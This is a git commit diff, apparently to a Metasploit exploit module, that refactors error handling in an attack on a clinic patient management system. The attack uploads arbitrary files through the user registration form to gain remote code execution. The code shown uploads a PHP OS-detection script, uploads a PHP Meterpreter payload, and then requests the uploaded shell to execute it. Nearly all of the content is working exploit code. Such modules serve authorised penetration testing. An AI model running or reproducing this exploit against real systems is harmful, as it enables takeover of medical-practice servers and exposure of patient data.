Made necessary changes as mentioned by the reviewer

aaryan-11-x · aaryan-11-x · commit 4c51165ec629 · 2024-12-17T16:07:58.000+05:30
diff --git a/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb b/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb
@@ -62,12 +62,18 @@ def check
     })
 
     unless res_session && res_session.code == 302 && res_session.get_cookies
-      print_error('Failed to retrieve PHPSESSID. Target may not be vulnerable.')
-      return CheckCode::Safe
+      print_error('Server connect error. Couldn\'t connect or get necessary information - try to check your options.')
+      return CheckCode::Unknown
     end
 
-    phpsessid = res_session.get_cookies.match(/PHPSESSID=([^;]+)/)[1]
-    vprint_good("Obtained PHPSESSID: #{phpsessid}")
+    phpsessid = res_session.get_cookies.match(/PHPSESSID=([^;]+)/)
+    if phpsessid.nil?
+      print_error('Failed to retrieve PHPSESSID. Target may not be vulnerable.')
+      return CheckCode::Unknown
+    else
+      phpsessid = phpsessid[1]
+      vprint_good("Obtained PHPSESSID: #{phpsessid}")
+    end
 
     # Step 2: Attempt File Upload
     dummy_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.txt"
@@ -103,12 +109,12 @@ def check
       'cookie' => "PHPSESSID=#{phpsessid}"
     })
 
-    if res_listing && res_listing.code == 200 && res_listing.body.include?(dummy_filename)
+    if res_listing && res_listing.code == 200 && !res_listing.body.nil? && res_listing.body&.include?(dummy_filename)
       vprint_good("File #{dummy_filename} found in /pms/user_images. Target is vulnerable!")
-      return CheckCode::Vulnerable
+      CheckCode::Vulnerable
     else
       vprint_error("File #{dummy_filename} not found in /pms/user_images. Target may not be vulnerable.")
-      return CheckCode::Appears
+      CheckCode::Unknown
     end
   end
 
@@ -154,10 +160,10 @@ def upload_shell
 
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res_listing && res_listing.code == 200
 
-    matches = res_listing.body.scan(/<a href="(\d+#{Regexp.escape(detection_basename)}\w*\.php)"/)
-    fail_with(Failure::NotFound, 'Uploaded OS detection script not found in directory listing') if matches.empty?
+    match = res_listing.body&.match(/<a href="(\d+#{Regexp.escape(detection_basename)}\w*\.php)"/)
+    fail_with(Failure::NotFound, 'Uploaded OS detection script not found in directory listing') if match.nil?
 
-    actual_detection_filename = matches.first.first
+    actual_detection_filename = match[1]
     vprint_status("Detected script filename: #{actual_detection_filename}")
 
     # Step 3: Execute the detection script
@@ -168,9 +174,9 @@ def upload_shell
       'method' => 'GET'
     })
 
-    fail_with(Failure::UnexpectedReply, 'Failed to execute OS detection script') unless res && res.code == 200
+    fail_with(Failure::UnexpectedReply, 'Failed to execute OS detection script') unless res && res.code == 200 && !res.body.nil?
     detected_os = res.body.strip.downcase
-    print_status("Detected OS: #{detected_os}")
+    vprint_status("Detected OS: #{detected_os}")
 
     # Step 4: Choose payload based on OS
     if detected_os.include?('win')
@@ -182,13 +188,13 @@ def upload_shell
     end
 
     # Step 5: Upload the payload
+    random_user = Rex::Text.rand_text_alphanumeric(8)
+    random_password = Rex::Text.rand_text_alphanumeric(12)
     payload_basename = Rex::Text.rand_text_alphanumeric(8).to_s
     payload_filename = "#{payload_basename}.php"
     print_status("Uploading PHP Meterpreter payload as #{payload_filename}...")
 
     post_data = Rex::MIME::Message.new
-    random_user = Rex::Text.rand_text_alphanumeric(8)
-    random_password = Rex::Text.rand_text_alphanumeric(12)
     post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"')
     post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"')
     post_data.add_part(random_password, nil, nil, 'form-data; name="password"')
@@ -219,18 +225,15 @@ def fetch_uploaded_filename
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res && res.code == 200
 
     # Search for the uploaded filename
-    matches = res.body.scan(/href="(\d+#{Regexp.escape(@uploaded_filename)})"/)
-    if matches.empty?
-      fail_with(Failure::NotFound, 'Uploaded file not found in directory listing')
-    end
-
-    matches.first.first
+    match = res.body&.match(/href="(\d+#{Regexp.escape(@uploaded_filename)})"/)
+    fail_with(Failure::NotFound, 'Uploaded file not found in directory listing') if match.nil?
+    match[1]
   end
 
   def execute_shell(uploaded_file)
     shell_url = normalize_uri(target_uri.path, 'user_images', uploaded_file)
     print_status("Executing the uploaded shell at #{shell_url}...")
-    send_request_cgi({
+    send_request_raw({
       'uri' => shell_url,
       'method' => 'GET'
     })
